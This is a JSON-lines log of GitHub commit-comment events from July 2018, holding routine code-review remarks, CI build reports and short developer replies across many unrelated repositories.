{"id":"7929124318","type":"CommitCommentEvent","actor":{"login":"wsalesky"},"repo":{"name":"biblia-arabica/biblia-arabica-data"},"payload":{"comment":{"id":29622016,"position":null,"line":null,"path":null,"commit_id":"c618bcc455f1c39241af3c726463317db9be976b","created_at":"2018-07-06T14:05:45Z","updated_at":"2018-07-06T14:05:45Z","author_association":"COLLABORATOR","body":"Currently the update function replaces the existing records with new versions. The difference between update and initiate is that update only does the records listed as changed, initiate will rerun all records.  We could re-write the script to only update portions of the record, but that does get a bit more complicated. "}},"created_at":"2018-07-06T14:05:45Z"}
{"id":"7929126840","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29622021,"position":null,"line":null,"path":null,"commit_id":"c3325181045b3082690eff766212293083d3ebca","created_at":"2018-07-06T14:06:14Z","updated_at":"2018-07-06T14:06:14Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - i386-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T14:06:14Z"}
{"id":"7929141143","type":"CommitCommentEvent","actor":{"login":"sergpolly"},"repo":{"name":"sergpolly/random_tools"},"payload":{"comment":{"id":29622056,"position":null,"line":null,"path":null,"commit_id":"562f0de81afb29ad8d58d5cc0184eaaca16f8da5","created_at":"2018-07-06T14:09:04Z","updated_at":"2018-07-06T14:09:04Z","author_association":"OWNER","body":"There was a small glitch in Rao et al 2014 GM final peaks list - see attached picture.\r\nDiscovered by doing pivot of  the corresponding DataFrame.\r\n![screenshot from 2018-07-06 10-01-00](https://user-images.githubusercontent.com/6790270/42383141-5b54555e-8104-11e8-9698-da8a20911a03.png)\r\n\r\n\"Duplicated\" (clearly overlapping) called peaks reported both at 5kb and 10kb resolutions, which is against the rules described in the Rao et al 2014, and suggest some kind of a minior bug in their code.\r\n"}},"created_at":"2018-07-06T14:09:04Z"}
{"id":"7929148678","type":"CommitCommentEvent","actor":{"login":"sr-murthy"},"repo":{"name":"OasisLMF/OasisLMF"},"payload":{"comment":{"id":29622069,"position":23,"line":130,"path":"setup.py","commit_id":"511f0ab0079bcf7e1a132851ce2ddab15418d743","created_at":"2018-07-06T14:10:33Z","updated_at":"2018-07-06T14:10:33Z","author_association":"CONTRIBUTOR","body":"This `raise` will fail because there's no import of `OasisException` in the module - it may be better to raise an ordinary `Exception` because you don't want `setup.py` to depend on one of the package modules that will be included in the build."}},"created_at":"2018-07-06T14:10:33Z"}
{"id":"7929148962","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"MoarVM/MoarVM"},"payload":{"comment":{"id":29622071,"position":14,"line":807,"path":"src/spesh/args.c","commit_id":"5ef61a7663c9c67d1829897819a3bd7aee5acae0","created_at":"2018-07-06T14:10:36Z","updated_at":"2018-07-06T14:10:36Z","author_association":"CONTRIBUTOR","body":"Should this say \"Skip over name**d**.\"?"}},"created_at":"2018-07-06T14:10:36Z"}
{"id":"7929150932","type":"CommitCommentEvent","actor":{"login":"techthreads"},"repo":{"name":"ThreadsStyling/tslint"},"payload":{"comment":{"id":29622075,"position":null,"line":null,"path":null,"commit_id":"3ec1f998b35246f1744e289d8e615b1fc945afbc","created_at":"2018-07-06T14:11:00Z","updated_at":"2018-07-06T14:11:00Z","author_association":"NONE","body":"Build version: __`0.0.0-SEMANTICALLY-RELEASED-master.9`__ :crossed_fingers: [`master`](https://github.com/ThreadsStyling/tslint/tree/master) on [*CircleCI*](https://circleci.com/gh/ThreadsStyling/tslint/9) :tada:"}},"created_at":"2018-07-06T14:11:00Z"}
{"id":"7929152015","type":"CommitCommentEvent","actor":{"login":"breitwieserCern"},"repo":{"name":"BioDynaMo/biodynamo"},"payload":{"comment":{"id":29622081,"position":null,"line":null,"path":null,"commit_id":"a6b19860daa0c7adee5b58df3b19d8e35dfbedcc","created_at":"2018-07-06T14:11:14Z","updated_at":"2018-07-06T14:11:14Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fix Paraview crash on exit](https://trello.com/c/Uzfp8DeY/193-fix-paraview-crash-on-exit)"}},"created_at":"2018-07-06T14:11:14Z"}
{"id":"7929153404","type":"CommitCommentEvent","actor":{"login":"breitwieserCern"},"repo":{"name":"BioDynaMo/biodynamo"},"payload":{"comment":{"id":29622084,"position":null,"line":null,"path":null,"commit_id":"a6b19860daa0c7adee5b58df3b19d8e35dfbedcc","created_at":"2018-07-06T14:11:29Z","updated_at":"2018-07-06T14:11:29Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add support for paraview in headless environments](https://trello.com/c/mwKqzeJS/192-add-support-for-paraview-in-headless-environments)"}},"created_at":"2018-07-06T14:11:29Z"}
{"id":"7929154817","type":"CommitCommentEvent","actor":{"login":"TornYaxuan"},"repo":{"name":"listen-now/listen-now"},"payload":{"comment":{"id":29622091,"position":null,"line":null,"path":null,"commit_id":"3b4ba41194a05c18b49ec2320a8b36b9fe9ce5e1","created_at":"2018-07-06T14:11:46Z","updated_at":"2018-07-06T14:11:46Z","author_association":"NONE","body":"音乐文件缓存目录"}},"created_at":"2018-07-06T14:11:46Z"}
{"id":"7929160217","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622103,"position":8,"line":8,"path":"content/rancher/v2.x/en/quick-start-guide/deployment/digital-ocean-qs/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T14:12:49Z","updated_at":"2018-07-06T14:12:49Z","author_association":"NONE","body":"typo incurr"}},"created_at":"2018-07-06T14:12:49Z"}
{"id":"7929160740","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29622106,"position":null,"line":null,"path":null,"commit_id":"63d9560ac2c98bfa55510fb9578402dae86ed8b7","created_at":"2018-07-06T14:12:55Z","updated_at":"2018-07-06T14:12:55Z","author_association":"CONTRIBUTOR","body":"Did you really have an issue?"}},"created_at":"2018-07-06T14:12:55Z"}
{"id":"7929162517","type":"CommitCommentEvent","actor":{"login":"yyh15331068"},"repo":{"name":"WorkBetterSDP/Documents"},"payload":{"comment":{"id":29622107,"position":null,"line":null,"path":null,"commit_id":"0d8807d1aa64aca4931d9abfb63c5330c077825a","created_at":"2018-07-06T14:13:13Z","updated_at":"2018-07-06T14:13:13Z","author_association":"CONTRIBUTOR","body":"安装部署说明V1.0"}},"created_at":"2018-07-06T14:13:13Z"}
{"id":"7929163663","type":"CommitCommentEvent","actor":{"login":"techthreads"},"repo":{"name":"ThreadsStyling/tslint"},"payload":{"comment":{"id":29622110,"position":null,"line":null,"path":null,"commit_id":"59fa90ad9908bff38741892e80271a2fb8a9ff23","created_at":"2018-07-06T14:13:26Z","updated_at":"2018-07-06T14:13:26Z","author_association":"NONE","body":"Build version: __`3.1.0-master.11`__ :crossed_fingers: [`master`](https://github.com/ThreadsStyling/tslint/tree/master) on [*CircleCI*](https://circleci.com/gh/ThreadsStyling/tslint/11) :tada:"}},"created_at":"2018-07-06T14:13:26Z"}
{"id":"7929175045","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29622137,"position":null,"line":null,"path":null,"commit_id":"819fc522f706d8a6b6f7eadafbcf5294b0dd7f0e","created_at":"2018-07-06T14:15:35Z","updated_at":"2018-07-06T14:15:35Z","author_association":"COLLABORATOR","body":"Running `make` after `make clean` didn't work, so I tried bumping up the version number of drasil-lang like you suggested @samm82 and that got me past this error."}},"created_at":"2018-07-06T14:15:35Z"}
{"id":"7929181012","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/crypto"},"payload":{"comment":{"id":29622145,"position":null,"line":null,"path":null,"commit_id":"93732ddfc98ebccec7b0805dda0f341fe538a0a6","created_at":"2018-07-06T14:16:45Z","updated_at":"2018-07-06T14:16:45Z","author_association":"OWNER","body":"###** Break the Query like this to understand the concept**\r\n\r\n```\r\n$this->db->query(\r\n\"INSERT INTO `\" . \r\nDB_PREFIX . \r\n\"coinbase_commerce_order` SET `store_order_id` = \r\n\t'\" . (int)$data['store_order_id'] . \"'\r\n\t\t, `store_total_amount` = \r\n\t'\" . $this->db->escape($data['store_total_amount']) . \"'\r\n\t\t, `coinbase_commerce_charge_code` = \r\n\t'\" . $this->db->escape($data['coinbase_commerce_charge_code']) . \"'\r\n\"\r\n\r\n);\r\n```\r\n\r\n```\r\n$query = $this->db->query(\r\n\"UPDATE `\" \r\n. DB_PREFIX . \r\n\"coinbase_commerce_order` SET `\r\n\t'\" . $key . \"'\r\n\t` = \r\n\t'\" . $value . \"' \r\n\t\tWHERE `store_order_id` = \r\n\t'\" . $data['store_order_id'] . \"'\r\n\"\r\n\r\n);\r\n```"}},"created_at":"2018-07-06T14:16:45Z"}
{"id":"7929182693","type":"CommitCommentEvent","actor":{"login":"chrisgtrsasebo"},"repo":{"name":"greerso/bhash-masternode"},"payload":{"comment":{"id":29622147,"position":null,"line":null,"path":null,"commit_id":"0164c458021f245480580a3563c362c70fdb1551","created_at":"2018-07-06T14:17:06Z","updated_at":"2018-07-06T14:17:06Z","author_association":"NONE","body":"cool"}},"created_at":"2018-07-06T14:17:06Z"}
{"id":"7929185047","type":"CommitCommentEvent","actor":{"login":"FreHu"},"repo":{"name":"FreHu/abap.tmbundle"},"payload":{"comment":{"id":29622151,"position":null,"line":null,"path":null,"commit_id":"18cabb73361f658060937367a0dba4c9a14c6b50","created_at":"2018-07-06T14:17:33Z","updated_at":"2018-07-06T14:17:33Z","author_association":"OWNER","body":"Fixes this:\r\n\r\n![code_2018-07-06_16-01-48](https://user-images.githubusercontent.com/5097067/42383618-071d32b0-8138-11e8-85b4-7f6ce0956a4c.png)\r\n"}},"created_at":"2018-07-06T14:17:33Z"}
{"id":"7929191714","type":"CommitCommentEvent","actor":{"login":"qwelias"},"repo":{"name":"vpulim/node-soap"},"payload":{"comment":{"id":29622173,"position":null,"line":null,"path":null,"commit_id":"d6d22c9209a7b2ebbc85e98b7a1a0a3cddb13ea1","created_at":"2018-07-06T14:18:51Z","updated_at":"2018-07-06T14:18:51Z","author_association":"NONE","body":"Since you have no issues section opened I'll comment here.\r\n\r\nThis is a minor release, but **[ENHANCEMENT] Enable multiArgs during promisification** is not an enhancement, it's a breaking change as the format of the resolved value had changed!"}},"created_at":"2018-07-06T14:18:51Z"}
{"id":"7929193660","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622177,"position":19,"line":10,"path":"content/rancher/v2.x/en/quick-start-guide/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T14:19:14Z","updated_at":"2018-07-06T14:19:14Z","author_association":"NONE","body":"This index will not be updated as it's static.\r\n\r\nmissing dots at end of these and following lines."}},"created_at":"2018-07-06T14:19:14Z"}
{"id":"7929194964","type":"CommitCommentEvent","actor":{"login":"ysong-aceinna"},"repo":{"name":"ysong-aceinna/hello-world"},"payload":{"comment":{"id":29622180,"position":null,"line":null,"path":null,"commit_id":"a78e58528c969ce12094caac2d00d228e76bbd75","created_at":"2018-07-06T14:19:29Z","updated_at":"2018-07-06T14:19:29Z","author_association":"OWNER","body":"add comment..."}},"created_at":"2018-07-06T14:19:29Z"}
{"id":"7929196447","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622181,"position":6,"line":6,"path":"content/rancher/v2.x/en/quick-start-guide/deployment/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T14:19:46Z","updated_at":"2018-07-06T14:19:46Z","author_association":"NONE","body":"We have provided a number of ways of to try and"}},"created_at":"2018-07-06T14:19:46Z"}
{"id":"7929198260","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622185,"position":10,"line":10,"path":"content/rancher/v2.x/en/quick-start-guide/deployment/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T14:20:08Z","updated_at":"2018-07-06T14:20:08Z","author_association":"NONE","body":"Vagrant configuration or Vagrantfile"}},"created_at":"2018-07-06T14:20:08Z"}
{"id":"7929198561","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29622186,"position":41,"line":3631,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"87ab05856d97af56526343bcee03fbda2c88b3ad","created_at":"2018-07-06T14:20:11Z","updated_at":"2018-07-06T14:20:11Z","author_association":"COLLABORATOR","body":"This looks suspicious, was it meant to be `adv`?"}},"created_at":"2018-07-06T14:20:11Z"}
{"id":"7929199240","type":"CommitCommentEvent","actor":{"login":"DiegoPino"},"repo":{"name":"Islandora/tuque"},"payload":{"comment":{"id":29622187,"position":null,"line":null,"path":null,"commit_id":"da68355c6c5fca43a636b2e443c3ced6930752a0","created_at":"2018-07-06T14:20:18Z","updated_at":"2018-07-06T14:20:18Z","author_association":"NONE","body":"@jordandukart will be in IRC in an hour or so. This requires a chat for sure. Thanks"}},"created_at":"2018-07-06T14:20:18Z"}
{"id":"7929203692","type":"CommitCommentEvent","actor":{"login":"tcely"},"repo":{"name":"docker-library/official-images"},"payload":{"comment":{"id":29622194,"position":4,"line":194,"path":"diff-pr.sh","commit_id":"f8555d46fda7995f722c0bf22357abae443bb551","created_at":"2018-07-06T14:21:10Z","updated_at":"2018-07-06T14:21:10Z","author_association":"NONE","body":"You probably should escape `.` with `\\.`"}},"created_at":"2018-07-06T14:21:10Z"}
{"id":"7929210261","type":"CommitCommentEvent","actor":{"login":"sambles"},"repo":{"name":"OasisLMF/OasisLMF"},"payload":{"comment":{"id":29622204,"position":23,"line":130,"path":"setup.py","commit_id":"511f0ab0079bcf7e1a132851ce2ddab15418d743","created_at":"2018-07-06T14:22:24Z","updated_at":"2018-07-06T14:22:24Z","author_association":"CONTRIBUTOR","body":"subprocess.check_call was also doing something strange  `error: [Errno 2] No such file or directory: 'cd': 'cd'`\r\nI tried adding `shell=True` but still didn't work\r\n"}},"created_at":"2018-07-06T14:22:24Z"}
{"id":"7929216023","type":"CommitCommentEvent","actor":{"login":"krupine"},"repo":{"name":"hj0030205/Github-3"},"payload":{"comment":{"id":29622219,"position":null,"line":null,"path":null,"commit_id":"b66e8837e5739ff25fbb74e9009f5eede1908243","created_at":"2018-07-06T14:23:28Z","updated_at":"2018-07-06T14:23:28Z","author_association":"COLLABORATOR","body":"새로고침 버튼도 지웠슴니다"}},"created_at":"2018-07-06T14:23:28Z"}
{"id":"7929220064","type":"CommitCommentEvent","actor":{"login":"alejoUTEC"},"repo":{"name":"git/git"},"payload":{"comment":{"id":29622225,"position":20,"line":20,"path":"Documentation/RelNotes/proyecto icc","commit_id":"3c09e28d4cc0d213d7d8ce280f9f18ecc9b9c9d1","created_at":"2018-07-06T14:24:13Z","updated_at":"2018-07-06T14:24:13Z","author_association":"NONE","body":"ellanoteama"}},"created_at":"2018-07-06T14:24:13Z"}
{"id":"7929243642","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29622261,"position":9,"line":10,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T14:28:34Z","updated_at":"2018-07-06T14:28:34Z","author_association":"CONTRIBUTOR","body":"Jails can be created automatically (by a plugin for example) and by users for their own use. This makes it sound like jails are only user created."}},"created_at":"2018-07-06T14:28:34Z"}
{"id":"7929244524","type":"CommitCommentEvent","actor":{"login":"sr-murthy"},"repo":{"name":"OasisLMF/OasisLMF"},"payload":{"comment":{"id":29622263,"position":23,"line":130,"path":"setup.py","commit_id":"511f0ab0079bcf7e1a132851ce2ddab15418d743","created_at":"2018-07-06T14:28:42Z","updated_at":"2018-07-06T14:28:42Z","author_association":"CONTRIBUTOR","body":"Probably better to replace `OasisException` by `Exception` - please ignore if you've done this already."}},"created_at":"2018-07-06T14:28:42Z"}
{"id":"7929252931","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29622280,"position":36,"line":30,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T14:30:15Z","updated_at":"2018-07-06T14:30:15Z","author_association":"CONTRIBUTOR","body":"s/check/set\r\n"}},"created_at":"2018-07-06T14:30:15Z"}
{"id":"7929254871","type":"CommitCommentEvent","actor":{"login":"xiaoshi2013"},"repo":{"name":"apache/lucene-solr"},"payload":{"comment":{"id":29622290,"position":null,"line":null,"path":null,"commit_id":"01d12777c4bcab7ae8085d5ed5e1b20a0e1a5526","created_at":"2018-07-06T14:30:35Z","updated_at":"2018-07-06T14:30:35Z","author_association":"NONE","body":"Very good"}},"created_at":"2018-07-06T14:30:35Z"}
{"id":"7929257574","type":"CommitCommentEvent","actor":{"login":"mwoehlke-kitware"},"repo":{"name":"Kitware/qtextensions"},"payload":{"comment":{"id":29622294,"position":null,"line":null,"path":null,"commit_id":"d26829922047bced3ff1ed945db9d6b2b24b2bbb","created_at":"2018-07-06T14:31:05Z","updated_at":"2018-07-06T14:31:05Z","author_association":"CONTRIBUTOR","body":"Ack, that check is just wrong. It *might* have worked somewhat by accident prior to kitware/fletch#388, but it's been broken(ish) since #6; nothing to do with this change.\r\n\r\nFixed in c2259d52fd9b."}},"created_at":"2018-07-06T14:31:05Z"}
{"id":"7929257700","type":"CommitCommentEvent","actor":{"login":"kellerrennkadse"},"repo":{"name":"savetheinternetinfo/website"},"payload":{"comment":{"id":29622295,"position":null,"line":null,"path":null,"commit_id":"af237e4c8e552951b5896e5c2d7000f49cc02b7b","created_at":"2018-07-06T14:31:06Z","updated_at":"2018-07-06T14:31:06Z","author_association":"MEMBER","body":"Where is the es5 mode bound to the build pipeline? I guess webpack will still use the standard tsconfig and actually I have no idea what type script defaults to. "}},"created_at":"2018-07-06T14:31:06Z"}
{"id":"7929262828","type":"CommitCommentEvent","actor":{"login":"biadias99"},"repo":{"name":"biadias99/matrizes"},"payload":{"comment":{"id":29622303,"position":360,"line":370,"path":"matrizes.c","commit_id":"baf208c181c8cfad3f349c3aeb7cc8f7fbfa9293","created_at":"2018-07-06T14:32:03Z","updated_at":"2018-07-06T14:32:03Z","author_association":"OWNER","body":"Já arrumado! 👍 "}},"created_at":"2018-07-06T14:32:03Z"}
{"id":"7929265079","type":"CommitCommentEvent","actor":{"login":"biadias99"},"repo":{"name":"biadias99/matrizes"},"payload":{"comment":{"id":29622307,"position":294,"line":306,"path":"matrizes.c","commit_id":"baf208c181c8cfad3f349c3aeb7cc8f7fbfa9293","created_at":"2018-07-06T14:32:28Z","updated_at":"2018-07-06T14:32:28Z","author_association":"OWNER","body":"Vou fazer <3 "}},"created_at":"2018-07-06T14:32:28Z"}
{"id":"7929265895","type":"CommitCommentEvent","actor":{"login":"biadias99"},"repo":{"name":"biadias99/matrizes"},"payload":{"comment":{"id":29622309,"position":294,"line":306,"path":"matrizes.c","commit_id":"baf208c181c8cfad3f349c3aeb7cc8f7fbfa9293","created_at":"2018-07-06T14:32:37Z","updated_at":"2018-07-06T14:32:37Z","author_association":"OWNER","body":"Também amo vc"}},"created_at":"2018-07-06T14:32:37Z"}
{"id":"7929268744","type":"CommitCommentEvent","actor":{"login":"biadias99"},"repo":{"name":"biadias99/matrizes"},"payload":{"comment":{"id":29622313,"position":125,"line":146,"path":"matrizes.c","commit_id":"baf208c181c8cfad3f349c3aeb7cc8f7fbfa9293","created_at":"2018-07-06T14:33:09Z","updated_at":"2018-07-06T14:33:09Z","author_association":"OWNER","body":"Já arrumado! 👍 "}},"created_at":"2018-07-06T14:33:09Z"}
{"id":"7929273320","type":"CommitCommentEvent","actor":{"login":"torniketar"},"repo":{"name":"grimmjo/jaxrs-analyzer-gradle-plugin"},"payload":{"comment":{"id":29622323,"position":null,"line":null,"path":null,"commit_id":"c0c143d490d8357745806acc41345596b9f19d4e","created_at":"2018-07-06T14:34:01Z","updated_at":"2018-07-06T14:34:01Z","author_association":"NONE","body":"Hello, i'm just trying to use your resources, for gradle.\r\ni'm just adding classpath 'com.github.grimmjo:jaxrs-analyser-gradle-plugin:0.1'\r\nand getting error Could not find method classpath() for arguments [com.github.grimmjo:jaxrs-analyser-gradle-plugin:0.1] \r\n\r\ncould you please fix it :)"}},"created_at":"2018-07-06T14:34:01Z"}
{"id":"7929275069","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29622334,"position":76,"line":90,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T14:34:21Z","updated_at":"2018-07-06T14:34:21Z","author_association":"CONTRIBUTOR","body":"I think Warren and I discussed \"configurables\" and that it shouldn't be used. For the last sentence maybe something like:\r\nThere are many configurable options logically grouped into four different primary sections."}},"created_at":"2018-07-06T14:34:21Z"}
{"id":"7929278085","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29622343,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-06T14:34:53Z","updated_at":"2018-07-06T14:34:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T14:34:53Z"}
{"id":"7929291687","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622371,"position":18,"line":18,"path":"content/rancher/v2.x/en/quick-start-guide/deployment/digital-ocean-qs/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T14:37:24Z","updated_at":"2018-07-06T14:37:24Z","author_association":"NONE","body":"cd quickstart"}},"created_at":"2018-07-06T14:37:24Z"}
{"id":"7929293011","type":"CommitCommentEvent","actor":{"login":"superseb"},"repo":{"name":"chrisurwin/docs"},"payload":{"comment":{"id":29622373,"position":20,"line":20,"path":"content/rancher/v2.x/en/quick-start-guide/deployment/digital-ocean-qs/_index.md","commit_id":"f966c24546554bd5d75c23dfca4215f15111d83d","created_at":"2018-07-06T14:37:39Z","updated_at":"2018-07-06T14:37:39Z","author_association":"NONE","body":".. by executing `cd do`"}},"created_at":"2018-07-06T14:37:39Z"}
{"id":"7929297148","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29622383,"position":19,"line":2011,"path":"src/CodeGen_Hexagon.cpp","commit_id":"42b86f9567828eb01f194401c0793cbb55ef4661","created_at":"2018-07-06T14:38:26Z","updated_at":"2018-07-06T14:38:26Z","author_association":"NONE","body":"should be 0xFFFFF"}},"created_at":"2018-07-06T14:38:26Z"}
{"id":"7929301247","type":"CommitCommentEvent","actor":{"login":"benib"},"repo":{"name":"nzzdev/Q-map"},"payload":{"comment":{"id":29622388,"position":null,"line":null,"path":null,"commit_id":"180ff7f18a7982e52adb2b4efc3271c1c95b345e","created_at":"2018-07-06T14:39:14Z","updated_at":"2018-07-06T14:39:14Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-06T14:39:14Z"}
{"id":"7929303988","type":"CommitCommentEvent","actor":{"login":"graemerocher"},"repo":{"name":"micronaut-projects/micronaut-core"},"payload":{"comment":{"id":29622392,"position":46,"line":128,"path":"security/src/test/groovy/io/micronaut/security/HealthSensitivitySpec.groovy","commit_id":"358a0099d116801cd3b16fedb190194fe3a6ad1a","created_at":"2018-07-06T14:39:46Z","updated_at":"2018-07-06T14:39:46Z","author_association":"MEMBER","body":"maybe these shouldn't be commented out again?"}},"created_at":"2018-07-06T14:39:46Z"}
{"id":"7929306783","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29622399,"position":5,"line":28,"path":"example/src/main/java/org/eclipse/hono/vertx/example/base/HonoExampleConstants.java","commit_id":"7ddbe1bb77feab65416e219d0cdf868d5e4b6c82","created_at":"2018-07-06T14:40:19Z","updated_at":"2018-07-06T14:40:19Z","author_association":"CONTRIBUTOR","body":"???"}},"created_at":"2018-07-06T14:40:19Z"}
{"id":"7929307214","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"joviane/cursoCPlusPlusAlura"},"payload":{"comment":{"id":29622401,"position":7,"line":7,"path":"programa.cpp","commit_id":"1a9917fe7f0bbeb934718e51f7ed57cd2fbeed8f","created_at":"2018-07-06T14:40:24Z","updated_at":"2018-07-06T14:40:24Z","author_association":"NONE","body":"endl"}},"created_at":"2018-07-06T14:40:24Z"}
{"id":"7929307419","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29622403,"position":null,"line":null,"path":null,"commit_id":"c3325181045b3082690eff766212293083d3ebca","created_at":"2018-07-06T14:40:27Z","updated_at":"2018-07-06T14:40:27Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2919 of 2935 tests passed, 21 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 26 tests had: EIO diffs.\n * 12 tests had: ESO small diffs.\n * 8 tests had: MTR small diffs.\n * 9 tests had: Table small diffs.\n * 6 tests had: ERR diffs.\n * 14 tests had: ESO big diffs.\n * 15 tests had: Table big diffs.\n * 9 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 607\n * Failed: 16\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.45%25-yellow.png)</a> \n"}},"created_at":"2018-07-06T14:40:27Z"}
{"id":"7929308504","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29622404,"position":1,"line":731,"path":"src/LLVM_Runtime_Linker.cpp","commit_id":"42b86f9567828eb01f194401c0793cbb55ef4661","created_at":"2018-07-06T14:40:40Z","updated_at":"2018-07-06T14:40:40Z","author_association":"NONE","body":"what is this for?"}},"created_at":"2018-07-06T14:40:40Z"}
{"id":"7929310224","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29622405,"position":null,"line":null,"path":null,"commit_id":"cf7dee069ba44e60b0179de539d1e41f8d276b6d","created_at":"2018-07-06T14:41:01Z","updated_at":"2018-07-06T14:41:01Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-240](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-240).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-240-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-06T14:41:01Z"}
{"id":"7929311119","type":"CommitCommentEvent","actor":{"login":"umitanuki"},"repo":{"name":"alpacahq/zipline"},"payload":{"comment":{"id":29622408,"position":40,"line":40,"path":"zipline/data/data_portal_alpaca.py","commit_id":"1cb594cd00afc4c4978a38b80242c551f90f1bcb","created_at":"2018-07-06T14:41:11Z","updated_at":"2018-07-06T14:41:11Z","author_association":"NONE","body":"How do you invalidate the cache?"}},"created_at":"2018-07-06T14:41:11Z"}
